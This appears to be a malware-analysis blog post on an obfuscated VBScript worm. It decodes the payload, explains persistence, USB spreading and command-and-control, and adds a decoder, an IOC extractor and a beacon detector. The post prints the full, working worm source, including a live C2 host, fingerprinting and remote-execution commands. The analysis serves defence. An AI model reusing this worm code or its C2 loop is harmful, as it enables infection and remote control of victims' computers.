۹ݘݕݓݡܝݘݢݡݔݐݓݨܬݣݡݤݔݣݗݔݝۼ۹ݘݕݓݡܝݓݡݘݥݔݣݨݟݔܬܠݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛݓݟܕݦݝܛݣݡݤݔۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟܕݦݝܘݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟܕݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓݘݕۼ۹ݕݞݡݔݐݒݗݕݘݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘݣݗݔݝۼ۹ݘݕݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘܫܭܑݛݝݚܑݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕݤݒݐݢݔܗݕݘܝݝݐݜݔܘܫܭݤݒ
ݐݢݔܗݦݝܘݣݗݔݝۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕܑܝܑܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܕݒܘܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡݔݐݒݗݕݞݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݕݞܝݝݐݜݔܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣݔݧݟݛݞݡݔݡܑܕݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺݢݞݕݣݦݐݡݔݒݛݐݢݢݔݢݕݞݛݓݔݡܑܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗܬݒݗݡݦܗܢܣܘۼ۹ݒܬݒݗݡݦܗܨܡܘۼ۹ݕݤܬݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘܕܑܼݘݒݡݞݢݞݕݣܝܴܽ݃ܵݡݐݜݔݦݞݡݚݥܡܝܟܝܤܟܦܡܦݥݑݒܝݔݧݔܑܘݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓݘݕۼ۹ۼ۹݄ܬݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ݄ܬܑܑݣݗݔݝۼ۹ݘݕݜݘݓܗݕݤܛܡܘܬܑܩܑܕݦݝݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣݒݐݢݔݢܗܟܘۼ۹ݒݐݢݔܑݔݧݒܑۼ۹ݢݐܬݢܗܠܘۼ۹ݔݧݔݒݤݣݔݢݐۼ۹ݒݐݢݔܑ݂ݒܑۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡܛܥۼ۹ݒݐݢݔܑܑ݁ܵۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡۼ۹ݒݐݢݔܑ݁ݔݝܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕܬݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕܬݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔܑ݄ݟܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘܬݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝܑݦݢݒݡݘݟݣܝݔݧݔܞܞܑܱܕݒݗܕݕݤܕݒݗܛܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔܑܲݛܑۼ۹݆ܝݠݤݘݣۼ۹ݒݐݢݔܑ݄ݝܑۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ"
var3 = 0
var2 = ""
while var3 != len(var1):
    var3 += 1
    # every payload character was shifted up by var6 - len(var5) = 1775; undo it
    var2 = var2 + chr(ord(mid(var1, var3, 1)) - var6 + len(var5))
print(var2)
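The loop above is tied to this one sample: it hard-codes both the key and the string. As an added example, not part of the original post, the following generalises it. It pulls the payload and key literals out of any dropper of this shape, derives the shift from the key the way the sample does, cross-checks it by recovering the shift without the key (the correct shift is the only one that maps the whole blob into printable ASCII), and finally greps the decoded stage for the indicators worth hunting for. The dropper it runs on is built in build_sample() from a short, made-up second stage with a made-up C2 host; only the key and the arithmetic come from the page.

```python
"""Generalized decoder for the dropper's key-sum shift scheme.

Added example, not the post's own script: the dropper shape, the function
names, the sample payload and the C2 host below are constructed.  Only the
scheme is taken from the page: every payload character is shifted up by
sum(AscW(key)) - len(key), the key being the literal "HGFTYtdcyfsaty!@#FFDS".
"""
import re
import string
from typing import Dict, List, Optional

KEY = "HGFTYtdcyfsaty!@#FFDS"          # key literal as on the page

# Constructed stand-in for the second stage (same shape as the real one,
# made-up C2 host); used only to build a sample dropper for the run below.
SAMPLE_PLAIN = (
    "' Coded by v_B01\r\n"
    "On Error Resume Next\r\n"
    'X.Open "POST","http://c2.example.invalid:7754/"&C,false\r\n'
    'sh.run "schtasks /create /sc minute /mo 1 /tn Skype /tr " & ChrW(34) & dr,false\r\n'
    'sh.regwrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ZTUK0MZ2SU", dr, "REG_SZ"\r\n'
)

ASCII_TEXT = {chr(i) for i in range(32, 127)} | {"\t", "\r", "\n"}
TEXTLIKE = set(string.ascii_letters + string.digits + " ")
STRING_RE = re.compile(r'"([^"\r\n]*)"')


def vbs_shift(key: str) -> int:
    """The shift the dropper applies: var6 - len(var5) in the script above
    (1775 for the page's key)."""
    return sum(ord(c) for c in key) - len(key)


def encode(plain: str, key: str) -> str:
    """Forward direction, used here only to build test input."""
    shift = vbs_shift(key)
    return "".join(chr(ord(c) + shift) for c in plain)


def decode(blob: str, shift: int) -> str:
    return "".join(chr(ord(c) - shift) for c in blob)


def recover_shift(blob: str) -> Optional[int]:
    """Keyless recovery.  The second stage is ASCII text, so the shift must map
    the lowest code point to at least TAB and the highest to at most '~'; that
    leaves a handful of candidates.  Among those that decode to pure ASCII
    text, pick the one with the most letters, digits and spaces (an off-by-one
    shift turns every space into 31 or 33 and fails the ASCII check anyway)."""
    codes = [ord(c) for c in blob]
    best, best_score = None, -1
    for shift in range(max(codes) - 126, min(codes) - 9 + 1):
        text = decode(blob, shift)
        if any(c not in ASCII_TEXT for c in text):
            continue
        score = sum(c in TEXTLIKE for c in text)
        if score > best_score:
            best, best_score = shift, score
    return best


def deobfuscate(vbs_source: str) -> str:
    """Pull payload and key out of a dropper of this shape and decode it.
    Heuristic: the payload is the longest string literal, the key the longest
    literal that is pure ASCII.  The key-derived shift is cross-checked against
    the keyless recovery so a wrong guess fails loudly instead of silently."""
    literals = STRING_RE.findall(vbs_source)
    payload = max(literals, key=len)
    key = max((s for s in literals if s.isascii()), key=len)
    shift = vbs_shift(key)
    if recover_shift(payload) != shift:
        raise ValueError("key-derived shift does not decode to ASCII text")
    return decode(payload, shift).replace("\r\n", "\n")


IOC_PATTERNS = {
    "urls": re.compile(r'https?://[^\s"&]+'),
    "tasks": re.compile(r"schtasks\s+/create\b.*?/tn\s+(\S+)"),
    "run_keys": re.compile(r'HK(?:CU|LM)\\[^"\s]*\\Run\\[^"\s]*'),
}


def extract_iocs(decoded: str) -> Dict[str, List[str]]:
    """Regex pass over the decoded stage for the artefacts worth hunting for:
    C2 URLs, scheduled-task names and Run-key values written as literals."""
    return {name: rx.findall(decoded) for name, rx in IOC_PATTERNS.items()}


def build_sample() -> str:
    """A dropper in the page's shape (declare, assign payload, key, echo) with
    short names.  Constructed for the run below; not the real file."""
    return (
        "dim v1\r\n"
        'v1 = "' + encode(SAMPLE_PLAIN, KEY) + '"\r\n'
        'v2 = ""\r\n'
        'v5 = "' + KEY + '"\r\n'
        "Wscript.Echo v2\r\n"
    )


if __name__ == "__main__":
    stage2 = deobfuscate(build_sample())
    print(stage2)
    print(extract_iocs(stage2))
```

To use it on the real dropper, read the .vbs as text and pass it to deobfuscate(); for this sample the key-derived and the recovered shift agree at 1775. Note that extract_iocs() only finds what is written as a literal: the C2 URL and the Skype task name are, but the Run key is assembled at runtime from the g() array (g(0) & g(3) & "ZTUK0MZ2SU"), so it has to be resolved by reading the array, not by regex.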
At the end of my script, instead of executing the decoded code as the malware would, I simply print it (the sample as I received it ends in Wscript.Echo, which displays the string rather than running it). The output is a complete, readable Visual Basic script:
' Coded by v_B01
On Error Resume Next
j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP")
g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")

Function go(m)
    If m=4 Then
        T="winmgmts:\\localhost\root\securitycenter"
        Set B=GetObject(y(3)).InstancesOf(y(4))
        For Each a in b
            go=a.displayName
            Exit For
        Next
        Set B=GetObject(y(3) & "2").InstancesOf(y(4))
        For Each a in b
            go=a.displayName
            Exit For
        Next
        If go="" Then go="Not-found"
    Else
        Set B=GetObject(y(0)).InstancesOf(y(m))
        For Each a in b
            If m = 1 Then
                go=a.volumeserialnumber
            ElseIf m = 2 Then
                go=a.caption
            End If
            Exit For
        Next
    End If
End Function

Set w = WScript
Set sh = Cr(0)
Set fs = Cr(1)

Function Cr(N)
    Set Cr = CreateObject(j(N))
End Function

Function Ex(s)
    Ex = sh.ExpandEnvironmentStrings("%"&s&"%")
End Function

Function Pt(C,A)
    Pt=""
    Set X=Cr(3)
    X.Open "POST","http://houstriko.dynu.net:7754/"&C,false
    X.setrequestheader "User-Agent:",nf
    X.send A
    Pt=X.responsetext
End Function

Function nf()
    nf=""
    i=go(1)
    s=VN & "_" & i
    nf=nf&s&c
    s=ex("COMPUTERNAME")
    nf=nf&s&c
    s=ex("USERNAME")
    nf=nf&s&c
    s=go(2)
    nf=nf&s&c
    s=go(4)
    nf=nf&s&c&c&nt&c&u&c
End Function

Sub Ns()
    On Error Resume Next
    dr=ex("AppData") & C & wn
    fs.CopyFile fu,dr,true
    sh.run "schtasks /create /sc minute /mo 1 /tn Skype /tr " & ChrW(34) & dr,false
    sh.regwrite g(0) & g(3) & "ZTUK0MZ2SU", Ch & dr & Ch, g(5)
    fs.copyfile fu, Cr(2).NameSpace(&H7).Self.Path &C & wn ,true
End Sub

dr=ex("AppData") & C & wn

Sub spr()
    On Error Resume Next
    For Each dr in fs.drives
        dp=dr.path & c
        If dr.isready = TRUE Then
            If dr.drivetype = 1 Then
                fs.copyfile fu,dp & wn,true
                If fs.fileexists(dp & wn) Then
                    fs.getfile(dp & wn).attributes=2+4
                End If
                For Each fi in fs.getfolder(dp).files
                    If instr(fi.name,".") Then
                        If lcase(split(fi.name,".")(ubound(split(fi.name,".")))) <>"lnk" Then
                            fi.attributes=2+4
                            If ucase(fi.name) <> ucase(wn) Then
                                With sh.createshortcut(dp & split(fi.name,".")(0) & ".lnk")
                                    .windowstyle = 7
                                    .targetpath = "cmd.exe"
                                    .arguments = "/c start " & replace(wn," ", ch & " " & ch) & "&start " & replace(fi.name," ", ch & " " & ch) &"&exit"
                                    fic = sh.regread(g(4) & sh.regread(g(4) & "." & split(fi.name, ".")(ubound(split(fi.name, ".")))& c) & g(6))
                                    If instr(iconlocation,",") = 0 Then
                                        .iconlocation = fi.path
                                    Else
                                        .iconlocation = fic
                                    End If
                                    .save()
                                End With
                            End If
                        End If
                    End If
                Next
                For Each fo in fs.getfolder(dp).subfolders
                    fo.attributes=2+4
                    With sh.createshortcut(dp & fo.name & ".lnk")
                        .windowstyle=7
                        .targetpath="cmd.exe"
                        .arguments="/c start " & replace(wn," ", ch & " " & ch) & "&start explorer " & replace(fo.name," ", ch & " " & ch) &"&exit"
                        fic=sh.regread("HKLM\software\classes\folder" & g(6))
                        If instr(.iconlocation,",")=0 Then
                            .iconlocation=fo.path
                        Else
                            .iconlocation=fic
                        End If
                        .save()
                    End With
                Next
            End If
        End If
    Next
    err.clear
End Sub

vn="Windows"
U=""
ch = chrw(34)
c = chrw(92)
fu = w.scriptfullname
wn=w.scriptname
NT="No"
If fs.fileexists(ex("Windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") Then
    NT="Yes"
End If

U= sh.regread(g(2))
If U="" Then
    If mid(fu,2)=":\" & wn Then
        U="TRUE"
        sh.regwrite g(2), U, g(5)
    Else
        U="FALSE"
        sh.regwrite g(2), U, g(5)
    End If
End If

Ns
spl="|V|"
While TRUE
    s = split(Pt("Vre",""),spl)
    select case s(0)
        case "exc"
            sa = s(1)
            execute sa
        case "Sc"
            s2 = Ex("temp") & "\" & s(2)
            Set wr = fs.OpenTextFile(s2,2,True)
            wr.Write s(1)
            wr.Close()
            sh.run s2,6
        case "RF"
            s2 = Ex("temp") & "\" & s(2)
            Set wr = fs.OpenTextFile(s2,2,True)
            wr.Write s(1)
            wr.Close()
            sh.run s2
        case "Ren"
            Set wr = fs.OpenTextFile(fu,1)
            f = wr.ReadAll
            wr.close()
            f = replace(f,ch&vn&ch,ch&s(1)&ch)
            Set wr = fs.OpenTextFile(fu,2,false)
            wr.Write f
            wr.close()
        Case "Up"
            Set wr = fs.OpenTextFile(fu,2,false)
            s(1) = replace(s(1),"|U|","|V|")
            wr.Write s(1)
            wr.Close()
            sh.run "wscript.exe //B " & ch & fu & ch, 6
            w.quit
        Case "Cl"
            W.quit
        Case "Un"
            S(1) = replace(S(1),"%f",fu)
            S(1) = replace(S(1),"%n",wn)
            S(1) = replace(S(1),"%sfdr",dr)
            execute S(1)
            w.quit
    End Select
    W.Sleep 6000
    Spr
Wend
From it, I can now see what the script actually does on a victim's computer.

Persistence (Sub Ns): it copies itself to %AppData%\<scriptname>, registers a scheduled task named Skype that runs that copy every minute (schtasks /create /sc minute /mo 1), writes the same path under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ZTUK0MZ2SU, and drops a third copy into the Startup folder (Shell.Application NameSpace(&H7)). The task runs the worm itself, not a downloaded payload.

Spreading (Sub spr): for every removable drive (drivetype = 1) it copies itself to the drive root, sets every file and folder there to hidden + system (attributes = 2+4), and creates one .lnk per item, carrying the original's icon, whose target is cmd.exe /c start <worm>&start <original>&exit, so opening anything on the stick relaunches the worm before the real file. The HKCU\vw0rm value records whether the script was started from a drive root (mid(fu,2) = ":\" & scriptname).

Command and control: every 6 seconds it POSTs to http://houstriko.dynu.net:7754/Vre with the victim fingerprint built by nf() in the User-Agent header, in the form Windows_<volume serial>\<computer name>\<user name>\<OS caption>\<antivirus product>\\<.NET 2.0 vbc.exe present: Yes/No>\<started from a drive root: TRUE/FALSE>\. The reply is split on |V| and dispatched on the first field: exc runs the second field with Execute, Sc and RF write it to %TEMP% and run it, Ren patches the quoted "Windows" tag in its own file, Up overwrites itself with the reply and relaunches through wscript.exe //B, Cl quits, and Un runs an uninstall script after substituting %f, %n and %sfdr. So the C2 is polled by the script's own loop, with the victim's information going out as a request header rather than in the body.
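On the detection side the beacon is easy to spot at a proxy, because the User-Agent is the fingerprint itself. As an added example, not part of the original post, the following parses constructed proxy log lines and flags POSTs whose User-Agent has the seven backslash-terminated fields that nf() builds. The log format, the client address and the C2 host c2.example.invalid are made up (the real sample used houstriko.dynu.net:7754); the field layout and the |V|-separated command set come from the decoded script.

```python
"""Beacon detection for the C2 exchange decoded above.

Added example, not part of the original post.  The User-Agent layout comes
from the decoded nf() function and the request path from Pt(); the log lines,
the client and the C2 host are constructed.
"""
import re
from typing import Dict, List, Optional

# User-Agent as built by nf():
#   Windows_<serial>\<host>\<user>\<os>\<av>\\<Yes|No>\<TRUE|FALSE>\
UA_RE = re.compile(
    r"^(?P<tag>[A-Za-z]+)_(?P<serial>[^\\]*)\\"
    r"(?P<host>[^\\]*)\\"
    r"(?P<user>[^\\]*)\\"
    r"(?P<os>[^\\]*)\\"
    r"(?P<av>[^\\]*)\\"
    r"\\(?P<dotnet>Yes|No)\\(?P<from_drive_root>TRUE|FALSE)\\$"
)

# Request types the bot sends to Pt(): "Vre" polls for a command; the reply is
# split on "|V|" and dispatched to exc / Sc / RF / Ren / Up / Cl / Un.
KNOWN_REQUESTS = {"Vre"}

# Constructed proxy log format:
#   <ts> <client> <method> <host:port> <path> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "(.*)"$')


def parse_beacon_ua(ua: str) -> Optional[Dict[str, str]]:
    """Return the fingerprint fields if the User-Agent has nf()'s shape, else None."""
    m = UA_RE.match(ua)
    return m.groupdict() if m else None


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Flag POSTs whose User-Agent is a worm fingerprint and pull out the
    victim details the operator receives with every poll."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, method, hostport, path, ua = m.groups()
        fp = parse_beacon_ua(ua)
        if method != "POST" or fp is None:
            continue
        request = path.lstrip("/")
        hit: Dict[str, object] = {
            "ts": ts,
            "client": client,
            "c2": hostport,
            "request": request,
            "known_request": request in KNOWN_REQUESTS,
        }
        hit.update(fp)
        hits.append(hit)
    return hits


# Constructed sample: one benign request and one beacon.
SAMPLE_LOG = [
    '2022-01-05T10:00:01Z 10.0.0.7 GET www.example.com:80 / "Mozilla/5.0 (Windows NT 10.0)"',
    '2022-01-05T10:00:07Z 10.0.0.7 POST c2.example.invalid:7754 /Vre '
    '"Windows_A1B2C3D4\\DESKTOP-TEST\\alice\\Microsoft Windows 10 Pro\\Windows Defender\\\\Yes\\TRUE\\"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

One caveat before relying on the User-Agent match alone: the script sets the header with setrequestheader "User-Agent:" (trailing colon in the name), so confirm in a packet capture which header name actually reaches the wire for the XMLHTTP build on the victim. The POST every six seconds to a dynamic-DNS host on a high port is a second, independent signal.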
Curious about the origin of the malware, I googled the C2 URL the POST is sent to and the coder's handle from the first line (v_B01). That led me to his Twitter, Instagram and YouTube accounts, and to a number of analyses of this malware on any.run, an interesting website.
What's any.run?
any.run is an interactive online sandbox: it gives you a disposable virtual machine in which to detonate a sample without risking your own machine, and, unlike a plain VM, it records every change the sample makes while it runs (processes, files, registry, network).
I am really happy to have found any.run, as I deal with malware daily. It lets me run a sample, safely watch what happens, and so learn what its functions do.